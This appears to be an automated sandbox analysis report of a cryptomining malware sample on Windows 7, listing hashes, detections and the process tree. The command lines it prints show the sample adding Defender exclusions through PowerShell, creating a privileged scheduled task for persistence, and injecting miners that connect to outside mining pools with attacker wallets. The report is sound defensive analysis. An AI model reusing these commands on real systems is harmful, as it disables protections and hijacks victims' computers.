Analysis
-
max time kernel
276s -
max time network
278s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
23/12/2022, 03:41
Static task
static1
Behavioral task
behavioral1
Sample
00b426ecc30bd92b36475650de45315bb643284efd12f9d43843868a10638358.exe
Resource
win7-20220812-en
General
-
Target
00b426ecc30bd92b36475650de45315bb643284efd12f9d43843868a10638358.exe
-
Size
902KB
-
MD5
ed8317be1bd5af62622d10bef3695bd7
-
SHA1
7bd670f5c16997f144367fa5316a70928f782b08
-
SHA256
00b426ecc30bd92b36475650de45315bb643284efd12f9d43843868a10638358
-
SHA512
cb400d441f730590b83c52970b628823575482474e7fbe4ce96ba9442fbec86b1be1fe4252e983f283e225016e6084f02cbe35ba4f673bf7a92b811ad4864a54
-
SSDEEP
6144:FN6Jq6tRTVgNA4ycmnyfnjDB7DNka3A6CCrpqEcL5GapWzL920M0j73PZYDdYfpX:FkUmuXXuyPXB7DXAiRezY24jLXfptl9
Malware Config
Signatures
-
Detectes Phoenix Miner Payload 4 IoCs
resource yara_rule behavioral1/memory/1604-132-0x0000000140829C40-mapping.dmp miner_phoenix behavioral1/memory/1604-135-0x0000000140000000-0x000000014082B000-memory.dmp miner_phoenix behavioral1/memory/1604-136-0x0000000140000000-0x000000014082B000-memory.dmp miner_phoenix behavioral1/memory/1604-137-0x0000000140000000-0x000000014082B000-memory.dmp miner_phoenix -
Executes dropped EXE 2 IoCs
pid Process 1696 UNXUV.exe 1124 UNXUV.exe -
resource yara_rule behavioral1/memory/1604-127-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral1/memory/1604-130-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral1/memory/1604-131-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral1/memory/1604-133-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral1/memory/1604-134-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral1/memory/1604-135-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral1/memory/1604-136-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral1/memory/1604-137-0x0000000140000000-0x000000014082B000-memory.dmp upx -
Loads dropped DLL 1 IoCs
pid Process 1116 cmd.exe -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1604 RegSvcs.exe 1604 RegSvcs.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1696 set thread context of 1600 1696 UNXUV.exe 43 PID 1696 set thread context of 1604 1696 UNXUV.exe 46 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1324 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1404 timeout.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1676 powershell.exe 1900 powershell.exe 1528 powershell.exe 1932 powershell.exe 1696 UNXUV.exe 1696 UNXUV.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 1832 00b426ecc30bd92b36475650de45315bb643284efd12f9d43843868a10638358.exe Token: SeDebugPrivilege 1696 UNXUV.exe Token: SeDebugPrivilege 1676 powershell.exe Token: SeDebugPrivilege 1900 powershell.exe Token: SeDebugPrivilege 1528 powershell.exe Token: SeDebugPrivilege 1932 powershell.exe -
Suspicious use of WriteProcessMemory 55 IoCs
description pid Process procid_target PID 1832 wrote to memory of 1932 1832 00b426ecc30bd92b36475650de45315bb643284efd12f9d43843868a10638358.exe 27 PID 1832 wrote to memory of 1932 1832 00b426ecc30bd92b36475650de45315bb643284efd12f9d43843868a10638358.exe 27 PID 1832 wrote to memory of 1932 1832 00b426ecc30bd92b36475650de45315bb643284efd12f9d43843868a10638358.exe 27 PID 1832 wrote to memory of 1900 1832 00b426ecc30bd92b36475650de45315bb643284efd12f9d43843868a10638358.exe 29 PID 1832 wrote to memory of 1900 1832 00b426ecc30bd92b36475650de45315bb643284efd12f9d43843868a10638358.exe 29 PID 1832 wrote to memory of 1900 1832 00b426ecc30bd92b36475650de45315bb643284efd12f9d43843868a10638358.exe 29 PID 1832 wrote to memory of 1116 1832 00b426ecc30bd92b36475650de45315bb643284efd12f9d43843868a10638358.exe 31 PID 1832 wrote to memory of 1116 1832 00b426ecc30bd92b36475650de45315bb643284efd12f9d43843868a10638358.exe 31 PID 1832 wrote to memory of 1116 1832 00b426ecc30bd92b36475650de45315bb643284efd12f9d43843868a10638358.exe 31 PID 1116 wrote to memory of 1404 1116 cmd.exe 33 PID 1116 wrote to memory of 1404 1116 cmd.exe 33 PID 1116 wrote to memory of 1404 1116 cmd.exe 33 PID 1116 wrote to memory of 1696 1116 cmd.exe 34 PID 1116 wrote to memory of 1696 1116 cmd.exe 34 PID 1116 wrote to memory of 1696 1116 cmd.exe 34 PID 1696 wrote to memory of 1676 1696 UNXUV.exe 35 PID 1696 wrote to memory of 1676 1696 UNXUV.exe 35 PID 1696 wrote to memory of 1676 1696 UNXUV.exe 35 PID 1696 wrote to memory of 1528 1696 UNXUV.exe 36 PID 1696 wrote to memory of 1528 1696 UNXUV.exe 36 PID 1696 wrote to memory of 1528 1696 UNXUV.exe 36 PID 1696 wrote to memory of 1628 1696 UNXUV.exe 39 PID 1696 wrote to memory of 1628 1696 UNXUV.exe 39 PID 1696 wrote to memory of 1628 1696 UNXUV.exe 39 PID 1628 wrote to memory of 1324 1628 cmd.exe 41 PID 1628 wrote to memory of 1324 1628 cmd.exe 41 PID 1628 wrote to memory of 1324 1628 cmd.exe 41 PID 1696 wrote to memory of 1600 1696 UNXUV.exe 43 PID 1696 wrote to memory of 1600 1696 UNXUV.exe 43 PID 1696 wrote to memory of 1600 1696 UNXUV.exe 43 PID 1696 wrote to memory of 1600 1696 UNXUV.exe 43 PID 1696 wrote to memory of 1600 1696 UNXUV.exe 43 PID 1696 wrote to memory of 1600 1696 UNXUV.exe 43 PID 1696 wrote to memory of 1600 1696 UNXUV.exe 43 PID 1696 wrote to memory of 1600 1696 UNXUV.exe 43 PID 1696 wrote to memory of 1600 1696 UNXUV.exe 43 PID 1696 wrote to memory of 1600 1696 UNXUV.exe 43 PID 1696 wrote to memory of 1600 1696 UNXUV.exe 43 PID 1696 wrote to memory of 1600 1696 UNXUV.exe 43 PID 1696 wrote to memory of 1600 1696 UNXUV.exe 43 PID 1696 wrote to memory of 1600 1696 UNXUV.exe 43 PID 1696 wrote to memory of 1600 1696 UNXUV.exe 43 PID 1600 wrote to memory of 1408 1600 vbc.exe 44 PID 1600 wrote to memory of 1408 1600 vbc.exe 44 PID 1600 wrote to memory of 1408 1600 vbc.exe 44 PID 1696 wrote to memory of 1604 1696 UNXUV.exe 46 PID 1696 wrote to memory of 1604 1696 UNXUV.exe 46 PID 1696 wrote to memory of 1604 1696 UNXUV.exe 46 PID 1696 wrote to memory of 1604 1696 UNXUV.exe 46 PID 1696 wrote to memory of 1604 1696 UNXUV.exe 46 PID 1696 wrote to memory of 1604 1696 UNXUV.exe 46 PID 1696 wrote to memory of 1604 1696 UNXUV.exe 46 PID 1652 wrote to memory of 1124 1652 taskeng.exe 48 PID 1652 wrote to memory of 1124 1652 taskeng.exe 48 PID 1652 wrote to memory of 1124 1652 taskeng.exe 48
Processes
-
C:\Users\Admin\AppData\Local\Temp\00b426ecc30bd92b36475650de45315bb643284efd12f9d43843868a10638358.exe"C:\Users\Admin\AppData\Local\Temp\00b426ecc30bd92b36475650de45315bb643284efd12f9d43843868a10638358.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1832 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'wz8wpHfkNldOXz9xAoaXj/wKfjNCkyytKClPPn6mQoN47qFu6FNCRfjl0WKAjUbtolh/Uf3Ux9JC7mIpke2GT6Tbtv3pSd8vqo+jOAAHjPuegtDbZ1CW+UvwTBh5Hn2i4QWh09V2KdwVSCNTx1oZkA=='2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1900
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp8A9.tmp.bat""2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:1404
-
-
C:\ProgramData\WinDW\UNXUV.exe"C:\ProgramData\WinDW\UNXUV.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'wz8wpHfkNldOXz9xAoaXj/wKfjNCkyytKClPPn6mQoN47qFu6FNCRfjl0WKAjUbtolh/Uf3Ux9JC7mIpke2GT6Tbtv3pSd8vqo+jOAAHjPuegtDbZ1CW+UvwTBh5Hn2i4QWh09V2KdwVSCNTx1oZkA=='4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1528
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "UNXUV" /tr "C:\ProgramData\WinDW\UNXUV.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "UNXUV" /tr "C:\ProgramData\WinDW\UNXUV.exe"5⤵
- Creates scheduled task(s)
PID:1324
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RM7iDCj2gk39Yur3Ee1kD7Aptrxw3Fk6BM.work -p x -t 54⤵
- Suspicious use of WriteProcessMemory
PID:1600 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls5⤵PID:1408
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe -pool ssl://eu1-etc.ethermine.org:5555 -wal 0xD97F71F033a694e2b2FC8E7D615cdF742C65b2d3.Rig121 -coin etc -log 04⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1604
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {2368AF71-954A-49EE-A364-2E44CA1C494D} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\ProgramData\WinDW\UNXUV.exeC:\ProgramData\WinDW\UNXUV.exe2⤵
- Executes dropped EXE
PID:1124
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
902KB
MD5ed8317be1bd5af62622d10bef3695bd7
SHA17bd670f5c16997f144367fa5316a70928f782b08
SHA25600b426ecc30bd92b36475650de45315bb643284efd12f9d43843868a10638358
SHA512cb400d441f730590b83c52970b628823575482474e7fbe4ce96ba9442fbec86b1be1fe4252e983f283e225016e6084f02cbe35ba4f673bf7a92b811ad4864a54
-
Filesize
902KB
MD5ed8317be1bd5af62622d10bef3695bd7
SHA17bd670f5c16997f144367fa5316a70928f782b08
SHA25600b426ecc30bd92b36475650de45315bb643284efd12f9d43843868a10638358
SHA512cb400d441f730590b83c52970b628823575482474e7fbe4ce96ba9442fbec86b1be1fe4252e983f283e225016e6084f02cbe35ba4f673bf7a92b811ad4864a54
-
Filesize
902KB
MD5ed8317be1bd5af62622d10bef3695bd7
SHA17bd670f5c16997f144367fa5316a70928f782b08
SHA25600b426ecc30bd92b36475650de45315bb643284efd12f9d43843868a10638358
SHA512cb400d441f730590b83c52970b628823575482474e7fbe4ce96ba9442fbec86b1be1fe4252e983f283e225016e6084f02cbe35ba4f673bf7a92b811ad4864a54
-
Filesize
138B
MD5864cd3e00858779288a2ca961494f25e
SHA113fa2c48e6df9d41ab7ff8087313fe2eb501021d
SHA256909ab59b86173013710d857b08f9c21b5f437aedf4959c00a590d881a3fa3139
SHA5120192d78e94239aac2932b2b595c531472e6b54d51512cf5bb32bc7c84da81e0ba6493be7ba4a03736ae986579040e59f359e6c21fb2b4c8222b6cd17a405112b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD59397f4625f8847dc801d105d60fba2fb
SHA195d67ecff049511dcf09c45ebb1f77262eb31b56
SHA256df44e950ac7d6f85988b5ebc82292a029b8bcdc886da1e054d7410fc7a7dd0fd
SHA5124b221558bd2c42bede0c4716ce38b6d037851c1c08748f45d197dcee286e687c268258bdace11cf2bf48aa3fbed21da7db9caef01393dc6b4ccfbb257ea0929a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD59397f4625f8847dc801d105d60fba2fb
SHA195d67ecff049511dcf09c45ebb1f77262eb31b56
SHA256df44e950ac7d6f85988b5ebc82292a029b8bcdc886da1e054d7410fc7a7dd0fd
SHA5124b221558bd2c42bede0c4716ce38b6d037851c1c08748f45d197dcee286e687c268258bdace11cf2bf48aa3fbed21da7db9caef01393dc6b4ccfbb257ea0929a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD578b0beac79674b0634d5ff27a9c208a4
SHA16fff69be72eb20ecb1a797504c6e4349d1193460
SHA2568eb8b1a92deaaaa710a5c90839ddfbb3141cba4c478248c97ce2ccafc8557a50
SHA512d47a33bac666800beb0bc8d9994e6953cd7821aaca29afb26e4f25db0aa84e19f319e3faf8fe02409918c043e39d4a3429394bcf8e5214f063df8fa9c25c86f5
-
Filesize
902KB
MD5ed8317be1bd5af62622d10bef3695bd7
SHA17bd670f5c16997f144367fa5316a70928f782b08
SHA25600b426ecc30bd92b36475650de45315bb643284efd12f9d43843868a10638358
SHA512cb400d441f730590b83c52970b628823575482474e7fbe4ce96ba9442fbec86b1be1fe4252e983f283e225016e6084f02cbe35ba4f673bf7a92b811ad4864a54